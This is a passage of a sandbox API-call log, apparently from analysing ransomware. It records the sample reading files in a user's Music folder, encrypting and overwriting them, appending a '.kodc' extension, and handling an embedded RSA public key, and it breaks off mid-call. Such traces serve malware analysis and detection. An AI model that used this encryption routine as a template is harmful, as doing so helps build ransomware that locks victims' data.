1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ace8 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acd0 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aca0 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac88 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d960 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.983] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x16c39, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x16c39, lpOverlapped=0x0) returned 1 [0098.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.984] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16c3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.984] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0098.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0098.984] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.984] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.984] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.984] CloseHandle (hObject=0x5cc) returned 1 [0098.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0098.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0098.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0098.987] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0i5A.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0i5a.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0i5A.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0i5a.mp3.kodc")) returned 1 [0098.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0098.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.987] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0098.989] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46f6b70, ftCreationTime.dwHighDateTime=0x1d5c4a0, ftLastAccessTime.dwLowDateTime=0x19805db0, ftLastAccessTime.dwHighDateTime=0x1d5bec7, ftLastWriteTime.dwLowDateTime=0x19805db0, ftLastWriteTime.dwHighDateTime=0x1d5bec7, nFileSizeHigh=0x0, nFileSizeLow=0xbc57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2pX7N-b_.mp3", cAlternateFileName="")) returned 1 [0098.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0098.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0098.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0098.989] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2pX7N-b_.mp3") returned=".mp3" [0098.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2pX7N-b_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2px7n-b_.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.989] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=48215) returned 1 [0098.989] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.992] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbc31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.992] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.993] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.993] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xbc57, lpOverlapped=0x0) returned 1 [0098.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.994] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.994] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.994] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0098.994] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.994] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.994] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.995] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.995] GetLastError () returned 0x0 [0098.995] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.995] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0098.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.995] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.995] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.995] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbc60) returned 0x9ba4d90 [0098.995] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d960 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac88 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d9a8 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aca0 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acd0 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ace8 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.996] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acd0 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ace8 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ace8 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331acd0 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ace8 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acd0 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.996] GetCurrentThreadId () returned 0x42c [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8fe08 [0098.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.997] GetCurrentThreadId () returned 0x42c [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acd0 [0098.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ace8 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acb8 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad00 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acd0 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acd0 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acd0 | out: hHeap=0x630000) returned 1 [0098.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.999] HeapFree (in: hHeap=0x630000, 